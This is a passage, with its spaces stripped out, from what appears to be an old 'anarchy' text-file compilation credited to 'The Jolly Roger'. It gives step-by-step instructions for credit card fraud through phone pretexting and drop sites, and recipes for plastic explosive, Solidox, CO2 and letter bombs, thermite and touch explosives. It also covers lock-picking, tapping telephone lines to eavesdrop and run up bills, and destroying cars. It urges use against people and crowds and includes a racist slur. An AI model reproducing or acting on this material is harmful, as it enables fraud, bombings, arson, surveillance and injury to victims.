dumpsterbehindthestore.But,duetothelargeamountofcreditcardfraud, manystoreshaveoptedtouseacarbonlesstransactionsheet,makingthingsmuch moredifficult.Thisiswhereyourphonecomesinhandy. First,lookupsomeoneinthephonebook,andobtainasmuchinformationas possibleaboutthem.Then,duringbusinesshours,callinaveryconvincing voice"Hello,thisisJohnDoefromtheVisaCreditCardFraudInvestigations Department.Wehavebeeninformedthatyourcreditcardmayhavebeenusedfor fraudulentpurposes,sowillyoupleasereadoffthenumbersappearingonyour Visacardforverification."Ofcourse,useyourimagination!Believeitornot, manypeoplewillfallforthisployandgiveouttheircreditinformation. Now,assumingthatyouhaveyourvictim'screditcardnumber,youshouldbeable todeciphertheinformationgiven. StepTwo:Recognizinginformationfromcarboncopies Cardexample:

[AmericanExpress] XXXXXXXXXXXXXXX MM/Y1THRUMM/Y2 JOESHMOE Explanation: MM/Y1isthedatethecardwasissued,andMM/Y2istheexpirationdate.The AmericanExpressGoldCardhasnumbersXXXXXXXXXXXXXXXXXXXXXX,andiscovered forupto$5000.00,evenifthecardholderisbroke. [Mastercard] 5XXXXXXXXXXXXXXX XXXXAAADDMMYYMM/YY JOESHMOE Explanation: XXXXinthesecondrowmaybeaskedforduringtheorderingprocess.Thefirst dateiswhenthecardwasnew,andthesecondiswhenthecardexpires.Themost frequentnumbercombinationusedis54241800XXXXXXXX.Therearemanyofthese cardsincirculation,butmanyoftheseareonwantedlists,socheckthese first. [Visa] 4XXXXXX(X)XXX(X)XXX(X) MM/YYMM/YY*VISA JOESHMOE Explanation: Visaisthemostabundantcard,andisacceptedalmosteverywhere.The"*VISA" issometimesreplacedwith"BWG",orfollowedwithaspecialcode.Thesecodes areasfollows: [1]MM/YY*VISAVPreferredCard [2]MM/YY*VISACVClassicCard [3]MM/YY*VISAPVPremierCard PreferredCardsarebackedwithmoney,andaremuchsafertouse.ClassicCards arenewer,hardertoreproducecardswithdecentbacking.PremierCardsare ClassicCardswithPreferredcoverage.Commonnumbersare4448020XXXXXX,4254 51236000XXXX,and425451238500XXXX.Any47121250XXXXXXXXcardsareIBM CreditUnioncards,andareriskytouse,althoughtheyareusuallycoveredfor largepurchases. StepThree:Testingcredit YoushouldnowhaveaVisa,Mastercard,orAmericanExpresscreditcardnumber, withthevictim'saddress,zipcode,andphonenumber.Bytheway,ifyouhave problemsgettingtheaddress,mostphonecompaniesoffertheAddressTracking Service,whichisaspecialnumberyoucallthatwillgiveyouanaddressfroma phonenumber,atanominalcharge.Nowyouneedtocheckthebalanceofcredit onthecreditcard(tomakesureyoudon'trunoutofmoney),andyoumustalso makesurethatthecardisn'tstolen.Todothisyoumustobtainaphonenumber thatbusinessesusetocheckoutcreditcardsduringpurchases.Ifyougotoa departmentstore,watchthecashierwhensomeonemakesacreditcardpurchase. He/shewillusuallycallaphonenumber,givethecreditinformation,andthen givewhatiscalleda"MerchantNumber".Thesenumbersareusuallywrittendown onoraroundtheregister.Itiseasytoeitherfindthesenumbersandcopy them,ortowaituntiltheycallonein.Watchwhattheydialandwaitforthe8

digit(usually)merchantnumber.Onceyoucallthenumber,inacalmvoice,read offtheaccountnumber,merchantnumber,amount,andexpirationdate.Thecredit bureauwilltellyouifitisOK,andwillgiveyouanauthorizationnumber. Pretendyouarewritingthisnumberdown,andrepeatitbacktothemtocheck it.Ignorethisnumbercompletely,foritservesnorealpurpose.However,once youdothis,thebankremovesdollarsequaltowhatyoutoldthem,becausethe cardwassupposedlyusedtomakeapurchase.Sometimesyoucantrickthe operatorbytellingherthecustomerchangedhismindanddecidednottocharge it.Ofcourse,somewillnotallowthis.Rememberatalltimesthatyouare supposedtobeastoreclerkcallingtocheckoutthecardforapurchase.Act likeyouaretalkingwithacustomerwhenhe/she"cancels". StepFour:Thedrop Oncethecardsarecleared,youmustfindaplacetohavethepackagesent. NEVERuseadropmorethanonce.Thefollowingaretypicaldropsites: [1]Anemptyhouse Anemptyhousemakesanexcellentplacetosendthings.SendthepackageUPS, andleaveanoteonthedoorsaying,"UPS.Iworkdays,8to6.Couldyouplease leavethepackageonthebackdoorstep?"Youcanfinddozensofhousesfroma realestateagentbytellingthemyouwanttolookaroundforahouse.Askfora listoftwentyhousesforsale,andtellthemyouwillcheckoutthearea.Do so,untilyoufindonethatsuitsyourneeds. [2]RentASpot UHaulsometimesrentsspaceswhereyoucanhavepackagessentandsignedfor. Endyourspacewhenthepackagearrives. [3]People'shouses Findsomeoneyoudonotknow,andhavethepackagesentthere.Callaheadsaying that"Icalledthestoreandtheysentthepackagetothewrongaddress.Itwas alreadysent,butcanyoukeepitthereforme?"Thisisaveryreliablewayif youkeepcalmwhentalkingtothepeople. DoNOTtrypostofficeboxes.Mostofthetime,UPSwillnotdelivertoapost officebox,andmanypeoplehavebeencaughtinthepastattemptingtousea postofficebox.Also,whenyouhavedeterminedadropsite,keepaneyeonit forsuspiciouscharactersandcarsthathavenotbeentherebefore. StepFive:Makingthetransaction Youshouldnowhaveareliablecreditcardnumberwithallthenecessarybilling information,andagooddropsite. Thebestplacetoorderfromiscatalogues,andmailorderhouses.Itisinyour bestinteresttoplacethephonecallfromapayphone,especiallyifitisa1 800number.Now,whenyoucall,don'ttrytodisguiseyourvoice,thinkingyou willtrickthesalespersonintobelievingyouareanadult.Thesefolksare trainedtodetectthis,soyourbestbetistoorderinyourownvoice.They willaskforthefollowing:name,nameasitappearsoncard,phonenumber, billingaddress,expirationdate,methodofshipping,andproduct.Askifthey offerUPSRedshipping(nextdayarrival),becauseitgivesthemlesstimeto researchanorder.IfyouareusingAmericanExpress,youmighthaveabitofa problemshippingtoanaddressotherthanthebillingaddress.Also,ifthe salespersonstartstoaskquestions,doNOThangup.Simplytalkyourwayoutof thesituation,soyouwon'tencourageinvestigationontheorder. Ifeverythinggoesright,youshouldhavetheproduct,freeofcharge.Insurance

picksupthetab,andnooneisanywiser.Becareful,andtrynottoorder anythingover$500.Insomestates,UPSrequiresasignatureforanythingover $200,nottomentionthatanythingover$200isdefinedasgrandtheft,aswell ascreditfraud.Getcaughtdoingthis,andyouwillbiteitforacoupleof years.Goodluck! 3.MakingPlasticExplosivesfromBleachbyTheJollyRoger Potassiumchlorateisanextremelyvolatileexplosivecompound,andhasbeen usedinthepastasthemainexplosivefilleringrenades,landmines,and mortarroundsbysuchcountriesasFranceandGermany.Commonhouseholdbleach containsasmallamountofpotassiumchlorate,whichcanbeextractedbythe procedurethatfollows. Firstoff,youmustobtain: 1. Aheatsource(hotplate,stove,etc.) 2. Ahydrometer,orbatteryhydrometer 3. AlargePyrex,orenameledsteelcontainer(toweighchemicals) 4. Potassiumchloride(soldasasaltsubstituteathealthandnutrition stores) Takeonegallonofbleach,placeitinthecontainer,andbeginheatingit. Whilethissolutionheats,weighout63gramsofpotassiumchlorideandaddthis tothebleachbeingheated.Constantlycheckthesolutionbeingheatedwiththe hydrometer,andboiluntilyougetareadingof1.3.Ifusingabattery hydrometer,boiluntilyoureadaFULLcharge. Takethesolutionandallowittocoolinarefrigeratoruntilitisbetween roomtemperatureand0C.Filteroutthecrystalsthathaveformedandsave them.Boilthissolutionagainandcoolasbefore.Filterandsavethecrystals. Takethecrystalsthathavebeensaved,andmixthemwithdistilledwaterinthe followingproportions:56gramsper100millilitersdistilledwater.Heatthis solutionuntilitboilsandallowtocool.Filterthesolutionandsavethe crystalsthatformuponcooling.Thisprocessofpurificationiscalled "fractionalcrystallization".Thesecrystalsshouldberelativelypurepotassium chlorate. Powderthesetotheconsistencyoffacepowder,andheatgentlytodriveoffall moisture. Now,meltfivepartsVaselinewithfivepartswax.Dissolvethisinwhite gasoline(campstovegasoline),andpourthisliquidon90partspotassium chlorate(thepowderedcrystalsfromabove)intoaplasticbowl.Kneadthis liquidintothepotassiumchlorateuntilintimatelymixed.Allowallgasolineto evaporate. Finally,placethisexplosiveintoacool,dryplace.Avoidfriction,sulfur, sulfides,andphosphorouscompounds.Thisexplosiveisbestmoldedtothe desiredshapeanddensityof1.3gramsinacubeanddippedinwaxuntilwater proof.Theseblocktypechargesguaranteethehighestdetonationvelocity.Also, ablastingcapofatleasta3grademustbeused. Thepresenceoftheaforementionedcompounds(sulfur,sulfides,etc.)results inmixturesthatareorcanbecomehighlysensitiveandwillpossiblydecompose explosivelywhileinstorage.Youshouldneverstorehomemadeexplosives,and youmustuseEXTREMEcautionatalltimeswhileperformingtheprocessesinthis article. Youmayobtainacatalogofothersubjectofthisnaturebywriting:

InformationPublishingCo. Box10042 Odessa,Texas79762 4.PickingMasterLocksbyTheJollyRoger HaveyouevertriedtoimpresssomeonebypickingoneofthoseMaster combinationlocksandfailed? TheMasterlockcompanymadetheiroldercombinationlockswithaprotection scheme.Ifyoupullthehandletoohard,theknobwillnotturn.Thatwastheir biggestmistake. Thefirstnumber: GetoutanyoftheMasterlockssoyouknowwhatisgoingon.Whilepullingon theclasp(partthatspringsopenwhenyougetthecombinationright),turnthe knobtotheleftuntilitwillnotmoveanymore,andaddfivetothenumberyou reach.Younowhavethefirstnumberofthecombination. Thesecondnumber: Spinthedialaroundacoupleoftimes,thengotothefirstnumberyougot. Turnthedialtotheright,bypassingthefirstnumberonce.Whenyouhave bypassedthefirstnumber,startpullingontheclaspandturningtheknob.The knobwilleventuallyfallintothegrooveandlock.Whileinthegroove,pull theclaspandturntheknob.Iftheknobisloose,gotothenextgroove,ifthe knobisstiff,youhavethesecondnumberofthecombination. Thethirdnumber: Aftergettingthesecondnumber,spinthedial,thenenterthetwonumbers. Slowlyspinthedialtotheright,andateachnumber,pullontheclasp.The lockwilleventuallyopenifyoudidtheprocessright. ThismethodofopeningMasterlocksonlyworksonoldermodels.Someoneinformed Masteroftheirmistake,andtheyemployedanewmechanismthatisfoolproof (fornow). 5.TheArtsofLockpickingIbyTheJollyRoger LockpickingI:Carsandassortedotherlocks Whilethebasicthemesoflockpickinganduninvitedentryhavenotchangedmuch inthelastfewyears,somemoderndevicesandtechniqueshaveappearedonthe scene. Automobiles: ManyolderautomobilescanstillbeopenedwithaSlimJimtypeofopener(these andotherautolocksmithingtechniquesarecoveredfullyinthebook"Inthe StilloftheNight",byJohnRussellIII);however,manycarmanufacturershave builtcasesoverthelockmechanism,orhavemovedthelockmechanismsothe SlimJimwillnotwork.So: AmericanLocksmithService P.O.Box26 CulverCity,CA90230 ALSoffersanewandimprovedSlimJimthatis30incheslongand3/4inches

wide,soitwillbothreachandslipthroughthenewcarlockcovers(insidethe door).Priceis$5.75plus$2.00postageandhandling. CarsmanufacturedbyGeneralMotorshavealwaysbeenabanetopeoplewhoneeded toopenthem,becausethesidebarlockingunittheyemployisverydifficultto pick.Tofurthercomplicatematters,thenewGMcarsemploymetalshieldsto maketheuseofaSlimJimtypeinstrumentverydifficult.So: LockTechnologyCorporation 685MainSt. NewRochelle,NY10801 LTCoffersacutelittletoolwhichwilleasilyremovethelockcylinderwithout harmtothevehicle,andwillallowyoutoenterand/orstartthevehicle.The GMC40sellsfor$56.00plus$2.00forpostageandhandling. Thebestgeneralautomobileopeningkitisprobablyasetoflockouttools offeredby: SteckMFGCorporation 1319W.StewartSt. Dayton,OH45408 For$29.95onecanpurchaseacompletesetofsixcarbonlockouttoolsthatwill openmorethan95%ofallthecarsaround. Kwicksetlockshavebecomequitepopularasonestepsecuritylocksformany typesofbuildings.Theyareabithardertopickandofferahigherdegreeof securitythananormalbuilderinstalleddoorlock.So: AMFG 1151WallaceSt. Massilon,OH44646 Priceis$11.95.Kwicksetlockscanhandilybedisassembledandthedooropened withoutharmtoeitherthelockorthedoorbyusingtheabovementionedKwick Outtool. Ifyouaretoolazytopickautolocks: VeehofSupply Box361 StormLake,IO50588 VSsellstryoutkeysformostcars(tryoutkeysareusedsincethereisnoone masterkeyforanyonemakeofcar,buttherearegrouptypemasters(a.k.a. tryoutkeys).Pricesaverageabout$20.00aset. UpdatedLockpicking: Foryears,therehavebeenanumberofpickattackproceduresformostpinand tumblerlocksystems.Inreverseorderofeasetheyareasfollows: NormalPicking: Usingapicksettoalignthepins,onebyone,untiltheshearlineissetand thelockopens. Racking: Thismethodusespicksthatareconstructedwithaseriesofbumps,ordiamond shapenotches.Thesepicksare"raked"(i.e.runoverallthepinsatonetime).

Withluck,thepinswillraiseintheopenpositionandstaythere.Raking,if successful,canbemuchlessofaneffortthanstandardpicking. LockAidGun: Thisgunshapeddevicewasinventedanumberofyearsagoandhasfound applicationwithmanylocksmithsandsecuritypersonnel.Basically,aneedle shapedpickisinsertedinthesnoutofthe"gun",andthe"trigger"ispulled. Thisactionsnapsthepickupanddownstrongly.Ifthetipisslippedunderthe pins,theywillalsobesnappedupanddownstrongly.Withabitofluckthey willstrikeeachotherandseparateattheshearlineforasplitsecond.When thishappensthelockwillopen.Thelockaidgunisnot100%successful,but whenitdoeswork,theresultsareverydramatic.Youcansometimesopenthe lockwithonesnapofthetrigger. Vibrator: Somecraftypeoplehavemountedaneedlepickintoanelectrictoothbrushpower unit.Thisvibratingeffectwillsometimesopenpintumblerlocksinstantly. Thereisnowanothermethodtoopenpinandwaferlocksinaveryshorttime. Althoughitresemblesatoothbrushpickinappearance,itisactuallyan electronicdevice.IamspeakingoftheCobrapickthatisdesignedandsoldby: FedCorporation P.O.Box569 Scottsdale,AR85252 TheCobrausestwoninevoltbatteries,teflonbearings(forlessnoise),anda camroller.Itcomeswiththreepicks(fordifferenttypesoflocks)andworks bothinAmericaandoverseas,onpinorwaferlocks.TheCobrawillopengroup onelocks(commondoorlocks)inthreetosevensecondswithnodamage,inthe handsofanexperiencedlocksmith.Itcantakeafewsecondsmoreoruptoa halfaminuteforsomeonewithnoexperienceatall.Itwillalsoopengrouptwo locks(includinggovernment,highsecurity,andmedicos),althoughthiscantake ashorttimelonger.ItwillnotopenGMsidebarlocks,althoughadeviceis abouttobeintroducedtofillthatgap.Howmuchforthistoythatwillopen mostlocksinsevenseconds? $235.00plus$4.00shippingandhandling. Foryouhardcoresafecrackers,FCalsosellstheMI6thatwillopenmost safesatacostof$10,000forthethreewheelattackmodel,and$10,500forthe fourwheelmodel.Itcomesinasturdyaluminumcarryingcasewithmonitor,disk driveandsoftware. Ifnoneofthesesafeandsaneideasappealtoyou,youcanalwaysfallbackon themagicthermallance... Thethermallanceisarathercrudeinstrumentconstructedfrom3/8inchhollow magnesiumrods.Eachtubecomesina10footlength,butcanbecutdownif desired.Eachoneisthreadedononeend.Tousethelance,youscrewthetube togetherwithamattedregulator(likeaweldingoutfituses)andhookupan oxygentank.Thenoxygenisturnedonandtherodislitwithastandardwelding igniter.Thedeviceproducesanincredibleamountofheat.Itisusedfor cuttingupconcreteblocksorevenrocks.Anactivelancewillgothroughafoot ofsteelinafewseconds.Thelanceisalsoknownasaburningbar,andis availablefrom: C.O.L.MFG 7748W.Addison Chicago,IL60634

6.TheArtsofLockpickingIIbyTheJollyRoger Soyouwanttobeacriminal.Well,ifyouwanttobelikeJamesBondandopena lockinfifteenseconds,thengotoHollywood,becausethatistheonlyplace youareevergoingtodoit.Evenexperiencedlocksmithscanspendfivetoten minutesonalockiftheyareunlucky.Ifyouarewantingextremelyquick access,lookelsewhere.Thefollowinginstructionswillpertainmostlytothe "lockinknob"typelock,sinceitistheeasiesttopick. Firstofall,youneedapickset.Ifyouknowalocksmith,gethimtomakeyou aset.Thiswillbethebestpossiblesetforyoutouse.Ifyoufinda locksmithunwillingtosupplyaset,don'tgiveuphope.Itispossibletomake yourown,ifyouhaveaccesstoagrinder(youcanuseafile,butittakes forever). Thethingyouneedisanallenwrenchset(verysmall).Theseshouldbesmall enoughtofitintothekeyholeslot.Now,bendthelongendoftheallenwrench ataslightangle(not90).Now,takeyourpicktoagrinderorafile,and smooththeenduntilitisroundedsoitwon'thanginsidethelock.Testyour tooloutondoorknobsatyourhousetoseeifitwillslideinandoutsmoothly. Now,thisiswherethescrewdrivercomesin.Itmustbesmallenoughforitand yourpicktobeusedinthesamelockatthesametime,oneabovetheother.In thecominginstructions,pleaserefertothischartoftheinteriorofalock: ______________________________ \K ||||||/E ||||\Y[|]Uppertumblerpin ^^/H[^]Lowertumblerpin ^^^^^^\O[]Cylinderwall /L(Thisisagreatlysimplified \Edrawing) ______________________________/ Theobjectistopressthepinupsothatthespacebetweentheupperpinand thelowerpinislevelwiththecylinderwall.Now,ifyoupushapinup,it's tendencyistofallbackdown,right?Thatiswherethescrewdrivercomesin. Insertthescrewdriverintotheslotandturn.Thistensionwillkeepthe "solved"pinsfromfallingbackdown.Now,workfromthebackofthelocktothe front,andwhenyouarethrough,therewillbeaclick,thescrewdriverwill turnfreely,andthedoorwillopen. Donotgetdiscouragedonyourfirsttry!Itwillprobablytakeyouabouttwenty tothirtyminutesyourfirsttime.Afterthat,youwillquicklyimprovewith practice. 7.SolidoxBombsbyTheJollyRoger Mostpeoplearenotawarethatavolatile,extremelyexplosivechemicalcanbe boughtoverthecounter:Solidox. Solidoxcomesinanaluminumcancontaining6greysticks,andcanbeboughtat KMart,andvarioushardwaresupplyshopsforaround$7.00.Solidoxisusedin weldingapplicationsasanoxidizingagentforthehotflameneededtomelt metal.ThemostactiveingredientinSolidoxispotassiumchlorate,afiller usedinmanymilitaryapplicationsintheWWIIera. SinceSolidoxisliterallywhatthenamesays:SOLIDOXygen,youmusthavean energysourceforanexplosion.Themostcommonandreadilyavailableenergy sourceiscommonhouseholdsugar,orsucrose.Intheory,glucosewouldbethe purestenergysource,butitishardtofindasolidsupplyofglucose.

Makingthemixture: 1. OpenthecanofSolidox,andremoveall6sticks.Onebyone,grindup eachofthesticks(preferablywithamortarandpestle)intothefinestpowder possible. 2. TheratioformixingthesugarwiththeSolidoxis1:1,soweighthe Solidoxpowder,andgrinduptheequivalentamountofsugar. 3. MixequivalentamountsofSolidoxpowder,andsugarina1:1ratio. Itisjustthatsimple!Younowhaveanextremelypowerfulsubstancethatcanbe usedinavarietyofapplications.Awordofcaution:beEXTREMELYcarefulin theentireprocess.Avoidfriction,heat,andflame.Afewyearsback,a teenagerIknewblew4fingersoffwhiletryingtomakeapipebombwith Solidox.Youhavebeenwarned! 8.HighTechRevenge:TheBeigeboxRev.2byTheJollyRoger I.Introduction Haveyoueverwantedalineman'shandset?Surelyeveryphreakhasatleastonce consideredthephunthathecouldhavewithone.Aftersearchingunlockedphone companytrucksformonths,wehadanidea.Wecouldbuildone.Wedid,andnamed itthe"BeigeBox"simplybecausethatisthecolorofours. Thebeigeboxissimplyaconsumerlineman'shandset,whichisaphonethatcan beattachedtotheoutsideofaperson'shouse.Tofabricateabeigebox,follow along. II.ConstructionandUse Theconstructionisverysimple.Firstyoumustunderstandtheconceptofthe device.Inamodularjack,therearefourwires.Thesearered,green,yellow, andblack.Forasinglelinetelephone,however,onlytwomatter:thered(ring) andgreen(tip).Theyellowandtheblackarenotnecessaryforthisproject.A lineman'shandsethastwoclipsonit:theringandthetip.Takeamodularjack andlookatthebottomofit'scasing.Thereshouldbeagreyjackwithfour wires(red,green,yellow&black)leadingoutofit.Totheendoftheredwire attacharedalligatorclip.Totheendofthegreenwireattachagreen alligatorclip.Theyellowandblackwirescanberemoved,althoughIwouldonly setthemasidesothatyoucanusethemodularjackinfutureprojects.Now insertyourtelephone'smodularplugintothemodularjack.That'sit.This particularmodelisnicebecauseitiscanbeeasilymade,isinexpensive,uses commonpartsthatarereadilyavailable,issmall,islightweight,anddoesnot requirethedestructionofaphone. III.BeigeBoxUses TherearemanyusesforaBeigeBox.However,beforeyoucanuseit,youmust knowhowtoattachittotheoutputdevice.ThisdevicecanbeofanyofBell switchingapparatusthatincludegerminalsets(i.e.remoteswitchingcenters, bridginheads,cans,etc.)ToopenmostBellTelephoneswitchingapparatus,you musthavea7/16inchhexdriver(oragoodpairofneedlenoseplierswork also).Thispieceofequipmentcanbepickedupatyourlocalhardwarestore. Withyourhexdriver(orpliers),turnthesecuritybolt(s)approximately1/8of aninchcounterclockwiseandopen.Ifyouroutputdeviceislocked,thenyou musthavesomeknowledgeofdestroyingand/orpickinglocks.However,wehave neverencounteredalockedoutputdevice.Onceyouhaveopenedyouroutput device,youshouldseeamassofwiresconnectedtoterminals.Onmostoutput devices,theterminalsshouldbelabeled"T"(Tipifnotlabeled,itis usuallyontheleft)and"R"(Ringifnotlabeled,usuallyontheright). Remember:Ringredright.The"ThreeR's"asimplewaytorememberwhich iswhich.Nowyoumustattachalltheredalligatorclip(Ring)tothe"R" (Ring)terminal.Attachthegreenalligatorclip(Tip)tothe"T"(Tip) terminal.

Note:Ifinsteadofadialtoneyouhearnothing,adjustthealligatorclipsso thattheyarenottouchingeachotherterminals.Alsomakesuretheyarefirmly attached.Bythistimeyoushouldhearadialtone.DialANItofindoutthe numberyouareusing(youwouldn'twanttouseyourown).Herearesome practicalapplications: ? ? ? ? ? ? ? Eavesdropping Longdistance,staticfree,freefonecallstophriends DialingdirecttoAllianceTeleconferencing(alsonostatic) Phuckingpeopleover Botheringtheoperatoratlittlerisktoyourself BlueBoxingwithgreatlyreducedchanceofgettingcaught Anythingatallyouwant,sinceyouareonanextensionofthatline

Eavesdropping Tobemosteffective,firstattachtheBeigeBoxthenyourphone.This eliminatesthestaticcausedbyconnectingthebox,thereforereducingthe potentialsuspicionofyourvictim.Wheneavesdropping,itisalwaysbesttobe neitherseennorheard.Ifyouhearsomeonedialingout,donotpanic;but ratherhangup,wait,andpickupthereceiveragain.Thepersonwilleither havehunguportriedtocompletetheircallagain.Ifthelatteristrue,then listenin,andperhapsyouwillfindinformationworthyofblackmail!Ifyou wouldliketoknowwhoyouarelisteningto,afterdialingANI,pullaCN/Aon thenumber. DialingLongDistance Thissectionisselfexplanatory,butdon'tforgettodiala"1"beforetheNPA. DialingDirecttoAllianceTeleconferencing Simplydial07004561000andyouwillgetinstructionsfromthere.Iprefer thismethodoverPBX's,sincePBX'softenhavepoorreceptionandaremore difficulttocomeby. PhuckingPeopleOver Thisisaverylargetopicofdiscussion.Justbyusingtheothertopics described,youcancreatealargephonebillfortheperson(theywillnothave topayforit,butitwillbeabighassleforthem).Inaddition,sinceyouare anextensionoftheperson'sline,youcanleaveyourphoneoffthehook,and theywillnotbeabletomakeorreceivecalls.Thiscanbeextremelynasty becausenoonewouldexpectthecauseoftheproblem. BotheringtheOperator Thisisalsoselfexplanatoryandcanprovidehoursofentertainment.Simplyask herthingsthatareoffensiveoryouwouldnotliketracedtoyourline.This alsocorrespondstothepreviouslydescribedsection,PhuckingPeopleOver. Afterall,guesswho'slineitgetstracedto? BlueBoxing SeeafileonBlueBoxingformoredetails.Thisisanespeciallynicefeature ifyouliveinanESSequippedprefix,sincethecallsare,onceagain,not tracedtoyourline... IV.POTENTIALRISKSOFBEIGEBOXING OveruseoftheBeigeBoxmaycausesuspicionswithintheGestapo,andresultin legalproblems.Therefor,Iwouldrecommendyou: ? ChooseasecludedspottodoyourBeigeBoxing, ? Usemorethanoneoutputdevice ? Keepalowprofile(i.e.,donotpostunderyourrealnameonapublicBBS concerningyouraccomplishments)

Inordertomakesuretheenemyhasnotbeeninsideyouroutputdevice,I recommendyouplaceapieceoftransparenttapeovertheopeningofyouroutput device.Therefor,ifitisopenedinyourabsence,thetapewillbedisplaced andyouwillbeawareofthefactthatsomeonehasintrudedonyourterritory. Now,imaginethepossibilities:a$2000dollarphonebillforthatspecial person,976numbersgalore,evenharassingtheoperatoratnorisktoyou! Thinkofitaswalkingintoanenemieshouse,andusingtheirphonetoyour heart'scontent. 9.HowtomakeaCO?bombbytheJollyRoger Youwillhavetouseupthecartridgefirstbyeithershootingitorwhatever. Withanail,forceaholebiggersoastoallowthepowderandwicktofitin easily.Fillthecartridgewithblackpowderandpackitinthererealgoodby tappingthebottomofthecartridgeonahardsurface(IsaidTAPnotSLAM!). Insertafuse.Irecommendagoodwaterproofcannonfuse,oranm80typefuse, butfirecrackerfuseswork,ifyoucanrunlikeablackmanrunsfromthecops afterrapingawhitegirl.)Now,lightitandrunlikehell!Itdoeswondersfor arowofmailboxes(liketheonesinapartmentcomplexes),acar(placeunder thegastank),apicturewindow(placeonwindowsill),aphonebooth(place rightunderthephone),oranyotherdeviousplace.Thisthingthrowsshrapnel, andcanmakequitamess!! 10.ThermiteIIbyJollyRoger Thermiteisnastyshit.Hereisagoodandeasywaytomakeit.Thefirststep istogetsomeironoxide(whichisRUST!).Hereisagoodwaytomakelarge quantitiesinashorttime: ? GetaDCconverterliketheoneusedonatrainset.Cuttheconnector off,separatethewires,andstripthemboth. ? Nowyouneedajarofwaterwithatablespoonorsoofsodiumchloride (whichisSALT!)addedtoit.Thismakesthewaterconductive. ? Nowinsertbothwiresintothemixture(Iamassumingyoupluggedthe converterin...)andletthemsitforfiveminutes.Oneofthemwillstart bubblingmorethantheother.ThisisthePOSITIVE(+)wire.Ifyoudonotdo thistestright,thefinalproductwillbetheopposite(chemically)ofrust, whichisRUSTACID.Youhavenouseforthishere(althoughitISuseful!). ? Anyway,putthenailtiedtothepositivewireintothejar.Nowputthe negativewireintheotherend.Nowletitsitovernightandinthemorning scrapetherustoffofthenail&repeatuntilyougotabunchofrustonthe bottomoftheglass.Begenerouswithyourrustcollection.Ifyouaregoing throughthetroubleofmakingthermite,youmightaswellmakealot,right? ? Nowremovetheexcesswaterandpourthecrustysolutionontoacookie sheet.Dryitinthesunforafewhours,orinsideovernight.Itshouldbean orangebrowncolor(althoughIhaveseenitinmanydifferentcolors!Sometimes thecolorgetsfuckedup,whatcanIsay...butitisstillironoxide!) ? Crushtherustintoafinepowderandheatitinacastironpotuntilit isred.Nowmixthepureironoxidewithpurealuminumfilingswhichcanbe boughtorfileddownbyhandfromanaluminumtubeorbar.Theratiooriron oxidetoaluminumis8gramsto3grams. ? Congrats!YouhavejustmadeTHERMITE!Now,tolightit...

? ThermiterequiresaLOTofheat(morethanablowtorch!)toignite. However,magnesiumribbon(whichissortofhardtofind..callaround)willdo thetrick.Ittakestheheatfromtheburningmagnesiumtolightthethermite. ? Nowwhenyouseeyourvictim'scar,pourafiftycentsizedpileontohis hood,sticktheribboninit,andlighttheribbonwiththeblowtorch.Now chuckleasyouwatchitburnthroughthehood,theblock,theaxle,andthe pavement.BECAREFUL!TheidealmixturescanvaporizeCARBONSTEEL!Anotheridea istousethermitetogetintopayphonecashboxes. 11.TouchExplosivesbytheJollyRoger Thisissortofamildexplosive,butitcanbequitedangerousinlarge quantities.Tomaketouchexplosive(suchasthatfoundinasnapnpop,but morepowerful),usethisrecipe: ? Mixiodinecrystalsintoammoniauntiltheiodinecrystalswillnot dissolveintotheammoniaanymore.Pourofftheexcessammoniaanddryoutthe crystalsonabakingsheetthesamewayasyoudriedthethermite(inother words,justletitsitovernight!). ? Becarefulnowbecausethesecrystalsarenowyourtouchexplosive. Carefullywrapabunchinpaper(Imeancarefully!Frictionsets'emoff!)and throwthemaround..prettyloud,huh?Theyarefuntoputonsomeone'schair. Addasmallfishsinkertothemandtheycanbethrownalongdistance(goodfor crowds,footballgames,concerts,etc.) 12.LetterBombsbyTheJollyRoger ? Youwillfirsthavetomakeamildversionofthermite.Usemyrecipe,but substituteironfillingsforrust. ? Mixtheironwithaluminumfillingsinaratioof75%aluminumto25% iron.Thismixturewillburnviolentlyinaclosedspace(suchasanenvelope). Thisbringustoournextingredient... ? Gotothepostofficeandbuyaninsulated(padded)envelope.Youknow, thetypethatisdoublelayered.Separatethelayersandplacethemildthermite inthemainsection,wheretheletterwouldgo.Thenplacemagnesiumpowderin theouterlayer.Thereisyourbomb!! ? Nowtolightit...thisisthetrickypartandhardtoexplain.Justkeep experimentinguntilyougetsomethingthatworks.Thefuseisjustthattouch explosiveIhavetoldyouaboutinanotheroneofmyanarchyfiles.Youmight wanttowrapitlikealongcigaretteandthenplaceitatthetopofthe envelopeintheouterlayer(ontopofthepowderedmagnesium).Whenthetouch explosiveistornorevensqueezedharditwillignitethepowderedmagnesium (sortofaflashlight)andthenitwillburnthemildthermite.Ifthethermite didn'tblowup,itwouldatleastburnthefuckoutofyourenemy(itdoes wondersonhumanflesh!). 13.PaintBombsbyTheJollyRoger Tomakeapainbombyousimplyneedametalpaincanwitharefastenablelid,a nicebrightcolorpaint(green,pink,purple,orsomegrosscolorisperfect!), andaquantityofdryice.Placethepaintinthecanandthendropthedryice in.Quicklyplacethetoponandthenrunlikehell!Withsometestingyoucan timethistoascience.Itdependsontheratioofdryicetopainttothesize ofthecantohowfullitis.Ifyouarereallypissedoffatsomeone,youcould

placeitontheirdoorstep,knockonthedoor,andthenrun!!Paintwillflyall overtheplace!! 14.WaystosendacartoHellbyTheJollyRoger Thereare1001waystodestroyacarbutIamgoingtocoveronlytheonesthat arethemostfun(foryou),themostdestructive(forthem),andthehardestto trace(forthecops). ? Placethermiteonthehood,lightit,andwatchitburnalltheway throughthepavement! ? TapeaCO?bombtothehood,axle,gastank,wheel,muffler,etc.

? Putatampon,dirt,sugar(thisoneisgood!),apingpongball,orjust aboutanythingthatwilldissolveinthegastank. ? Putpotatoes,rocks,bananas,oranythingthatwillfit,intothe tailpipe.Useabroomhandletostuff'emupintothetailpipe. ? ? ? Putalongragintothegastankandlightit... Stealakey,copyit,replaceit,andthenstealthestereo. Breakintothecar.Cutathinmetalrulerintoashapelikethis:

